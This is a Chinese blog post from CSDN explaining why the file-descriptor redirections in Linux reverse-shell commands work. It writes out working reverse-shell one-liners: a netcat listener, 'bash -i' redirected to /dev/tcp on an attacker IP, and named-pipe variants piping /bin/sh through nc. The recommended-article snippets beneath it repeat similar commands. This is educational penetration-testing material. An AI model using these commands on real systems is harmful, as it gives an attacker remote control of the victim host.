Linux反弹shell中重定向的理解(个人见底、方家斧正)

最新推荐文章于 2024-08-13 17:50:19 发布
最新推荐文章于 2024-08-13 17:50:19 发布
阅读量741 收藏
点赞数 1
文章标签: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/100154720
版权

Linux反弹shell

攻击机执行命令(IP:192.168.59.128):

nc -l -vv -p 1234

靶机执行命令:

bash -i &> /dev/tcp/192.168.59.128/1234 0>&1

攻击机执行命令中:

  1. -l 开启连接监听(TCP)
  2. -vv 详细信息(不是我写错了,可以是双V,展示更详细信息)
  3. -p 靶机连接攻击机的端口号

靶机执行命令中:

  1. 一共有两个命令bash -i 和 /dev/tcp/192.168.59.128/1234
  2. bash -i 打开一个交互的shell
  3. /dev/tcp/192.168.59.128/1234 建立TCP连接

现在有两个问题要解决。
1、两个命令连接。
2、向shell的输入数据传递和shell回显数据传递问题。
这是就会发现Linux重定向的妙用。使用 >& 将两个命令连接(可以理解将标准输出和错误重定向到TCP连接),使用0<&1将输入重定向到输出。
至于说为什么不使用>,可以参考:
https://www.runoob.com/linux/linux-shell-io-redirections.html
https://www.freebuf.com/articles/system/153986.html
https://www.anquanke.com/post/id/85712
其实以上都是对于其他博文的理解与整合,不算自己的。
针对于第三篇博文所述

bash -i &> /dev/tcp/192.168.59.128/1234 0<&1

bash -i &> /dev/tcp/192.168.59.128/1234 0>&1

两个命令执行都能反弹获得shell,个人理解:文件描述符 0 通常是标准输入(STDIN),1 是标准输出(STDOUT),2 是标准错误输出(STDERR),由于在TCP连接建立后,标准输入输出端均已确定,所以我猜测无论重定向方向如何,只能是一个输入一个输出,所以重定向中>符号的方向不影响结果。

常见反弹shell姿势:

root@kali:~# mknod /tmp/backpipe p                        #root权限执行
root@kali:~# /bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe

backpipe是一个设备文件,创建管道所必须的。第二条命令中先将/bin/sh 的输入重定向到管道,再将nc连接端口的输出重定向到管道。可以用下图来理解。我曾尝试同时输出错误信息,但没成功,路过的大佬知道可以讲下。
在这里插入图片描述在这里插入图片描述

 root@kali:~# mkfifo /tmp/backpipe p                 #没有root权限情况下可以使用该命令
 root@kali:~# /bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe

tips:
1、mkfifo与mknod均为创建管道命令的两种方法,使用权限高低而已。
2、由于时间关系,环境测试不是同一个IP,可能有变动。
3、以上均为个人理解,如有错误还希望各位不吝赐教。

痴人说梦梦中人
关注
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
Linux下内网反弹技巧总结与杂谈
u014389734的博客
07-08 1049
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
openssl 来进行反弹shell
最新发布
Arzum的博客
08-13 164
1. 服务端开启两个监听,从 ip:port1 获取命令发送给 cmd.exe执行,然后结果返回到 ip:port2。3. 在目标上用openssl加密反弹shell的流量(使用openssl单向认证)2.服务端上监听反弹shell
Linux反弹命令
qq_64332865的博客
11-27 1728
反弹shell 反弹shell的含义:反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell需要用到哪里,通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 1.某客户机了你的网马,但是它在局域网内,你直接连接不了。 2.目标机器的ip动态改变,你不能持续控制。 3.由于防火
反弹shell初识
无痕的博客
11-01 4127
反弹shell的指令与演示
反弹Shell原理与实现
m0_62451321的博客
11-14 3271
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机了你的木马,但是它在局域网内,你直接连接不了。
浙江大学《数据结构》网络公开课Linux-C语言实现
06-15
本人本科专业时学习过《数据结构》,但由于研究生专业为计算机的非工程类专业,所以用到的机会比较少。...PS:运行代码只需在Linux环境下make就可以,另外课程有些习题的代码没写,以后有时间会进行更新的。
黑龙江省哈尔滨市第三学校2020学年高二语文上学期第二次月考试题.doc
10-14
5. 交际礼仪与用语得体:题目出现的选项涉及日常交际的语言表达,如“请在家等候”、“责成学校领导研究落实”、“不吝赐教”、“敬请斧正”等,这要求学生掌握不同场合下的礼貌用语和表达方式。 6. 语文综合...
基于Matlab系统的HVDC系统设计(旧文望斧正).doc
10-19
高压直流输电(HVDC)技术是电力系统的一种重要技术,它可以将电力从一个点传输到另一个点,具有高效、可靠、灵活等特点。HVDC技术的发展历史可以追溯到1882年,当时德国物理学家Graf von Siemens首次提出使用直流...
数据库第一章一些名词的定义及理解
01-19
这一周主要学习了数据库相关的一些概念,作为作业,也同时为了记下自己对这些概念的理解,可能会理解有偏差的地方,感谢大佬们斧正。 数据 数据库 数据库管理系统 数据库系统 数据 单独的一个数据只是一个有特殊值的...
nc的使用+反弹shell
2301_80366980的博客
02-18 966
记录学习linuxnc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
反弹shell总结
weixin_44576725的博客
04-26 4629
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器。 可能有人会问:我们都能够在靶机
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2598
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 333
前言 在渗透测试过程反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
反弹shell原理
Monica的博客
11-01 2344
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
【安全知识】——LInuxshell反弹姿势合集(更新
Demo不是emo的博客
05-17 6217
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
linux反弹shell方法
weixin_53747497的博客
07-12 2128
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
Linux反弹shell
内心不种满鲜花就会长满杂草
04-21 4236
在渗透过程,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
Quest3D文入门教程3.6.6指南
《Quest3D文教程指南》是一份详细的入门教程,旨在帮助初次接触该软件的用户快速理解和上手。作者火啸天提供了一个版本为3.6.6的文译本,其目的是为了让读者在没有完整英文帮助的情况下也能进行基本操作。教程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值